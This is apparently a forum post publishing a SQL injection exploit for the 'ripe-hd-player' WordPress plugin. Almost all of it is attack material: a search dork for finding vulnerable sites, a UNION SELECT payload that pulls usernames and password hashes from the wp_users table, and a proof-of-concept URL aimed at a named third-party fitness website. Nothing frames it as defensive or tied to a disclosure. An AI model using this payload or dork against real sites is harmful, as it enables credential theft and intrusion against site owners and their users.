|
Познающий
Регистрация: 31.10.2011
Сообщений: 35
С нами:
7648886
Репутация:
5
|
|
# Exploit Title: ripe-hd-player SQL-Inj
# Date: 19.10.2012
# Exploit Author:ukrpunk
# Vendor Homepage: find by yourself
# Software Link: find by yourself
# Version: don't know
# Tested in: web
# Dork:inurl:"/plugins/ripe-hd-player"
# Exploit:-1+union+select+1,2,3,4,5,concat(user_login,0x3a,us er_pass),7,8,9,10,11,12,13,14,15,16,17+from+wp_use rs--
# PoC: http://www.fitness-bucuresti.ro/wp-content/plugins/ripe-hd-player/config.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,us er_pass),7,8,9,10,11,12,13,14,15,16,17+from+wp_use rs--
|